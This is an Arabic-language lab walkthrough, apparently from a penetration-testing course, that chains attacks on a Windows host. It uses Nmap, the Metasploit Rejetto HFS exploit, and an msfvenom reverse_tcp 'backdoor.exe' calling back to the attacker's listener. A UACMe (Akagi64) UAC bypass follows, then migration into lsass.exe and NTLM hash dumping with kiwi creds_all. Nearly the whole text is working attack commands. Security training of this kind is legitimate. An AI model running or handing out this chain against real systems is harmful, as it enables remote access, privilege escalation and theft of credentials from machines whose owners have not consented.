🧪 المختبر 8: تجاوز UAC على Windows باستخدام UACMe

🎯 الهدف الأساسي: تجاوز التحكم في حساب المستخدم (UAC) على نظام Windows باستخدام UACMe للحصول على جلسة Meterpreter بامتيازات مرتفعة، ومن ثم استخراج تجزئات كلمات مرور NTLM.

📜 خطوات التنفيذ:

📊 منهجية اختبار الاختراق: الاستطلاع، الفحص، الاستغلال، ما بعد الاستغلال (تجاوز UAC، استخراج الهاشات)

  1. الفحص واكتشاف الثغرات:

    • قم بإجراء فحص Nmap على الهدف لتحديد الخدمات المفتوحة وإصداراتها.

    • الأمر:

      nmap -sV -p 80 <Target_IP>
    • الشرح: بتحصل ان خادم HTTP File Server (HFS) يشتغل على المنفذ 80 بإصدار ضعيف مثل HFS 2.3.

  2. الحصول على الوصول الأولي (جلسة Meterpreter):

    • الأمر:

      msfconsole -q
      setg RHOSTS <Target_IP>
      use exploit/windows/http/rejetto_hfs_exec
      exploit
    • الشرح: بتحصل على جلسة Meterpreter على الهدف.

    • تعداد المعلومات الأولية:

    • الأمر: (داخل جلسة Meterpreter)

      sysinfo
      getuid
      getpriv
    • الشرح:ستحدد إصدار Windows (مثلاً Windows Server 2012 R2)، واسم المستخدم الحالي (مثلاً admin)، وبتلاحظ أن الامتيازات محدودة.

    • الأمر: (داخل جلسة Meterpreter)

      getsystem
    • الشرح: إذا فشل فهذا يؤكد أن UAC يمنع رفع الامتيازات.

    • الأمر: (داخل جلسة Meterpreter)

      shell
      net localgroup administrators
    • الشرح: فستجد أن المستخدم الحالي (admin) عضو في مجموعة Administrators. هذا شرط لتجاوز UAC.

  3. تجاوز UAC واستخراج الهاشات:

    • توليد حمولة Meterpreter جديدة:

    • الأمر: (من جهاز Kali الخاص بك)

      msfvenom -p windows/meterpreter/reverse_tcp  LHOST=10.10<IP-you>
       LPORT=1234
        -f exe 
        -o backdoor.exe
    • الشرح: سيتم إنشاء ملف backdoor.exe.

    • إعداد مستمع Metasploit:

    • الأمر: (في نافذة Metasploit Console جديدة)

      use exploit/multi/handler
      set PAYLOAD windows/meterpreter/reverse_tcp
      set LHOST <YOU_IP>
      set LPORT 1234
      exploit
    • الشرح: إذا نفذت هذه الأوامر، سيبدأ Metasploit في الاستماع للاتصالات الواردة من backdoor.exe.

    • تحميل UACMe والحمولة:

    • على جلسة Meterpreter الأولية، قم بإنشاء دليل مؤقت وقم بتحميل UACMe (مثلاً Akagi64.exe) وملف backdoor.exe إليه.

    • الأمر: (داخل جلسة Meterpreter)

      mkdir C:\temp
      upload /path/to/Akagi64.exe C:\\temp\\Akagi64.exe
      upload /path/to/backdoor.exe C:\\temp\\backdoor.exe
    • الشرح: إذا نفذت هذه الأوامر، فسيتم نقل الملفات إلى الهدف.

    • الأمر: (داخل جلسة Meterpreter الأولية)

      execute -f C:\temp\Akagi64.exe -a "23 C:\temp\backdoor.exe"
    • الشرح:سيتم تجاوز UAC، وستتلقى جلسة Meterpreter جديدة بامتيازات مرتفعة على مستمع Metasploit.

    • ترقية امتيازات Meterpreter (الترحيل إلى lsass.exe):

    • الأمر الأساسي: (داخل جلسة Meterpreter المرتفعة)

      ps
    • الشرح: ستعرض لك الوحدة جميع العمليات. ابحث عن lsass.exe وقم بتدوين PID الخاص بها.

    • الأمر: (داخل جلسة Meterpreter المرتفعة)

      migrate 688
    • الشرح: فسيتم ترحيل جلسة Meterpreter إلى عملية lsass.exe، مما يمنحك امتيازات NT AUTHORITY\SYSTEM.

    • الأمر: (داخل جلسة Meterpreter المرتفعة)

      load kiwi
      creds_all
    • الشرح: ستقوم Kiwi باستخراج تجزئات كلمات مرور NTLM (بما في ذلك Administrator و student) ومفتاح Syskey.

Last updated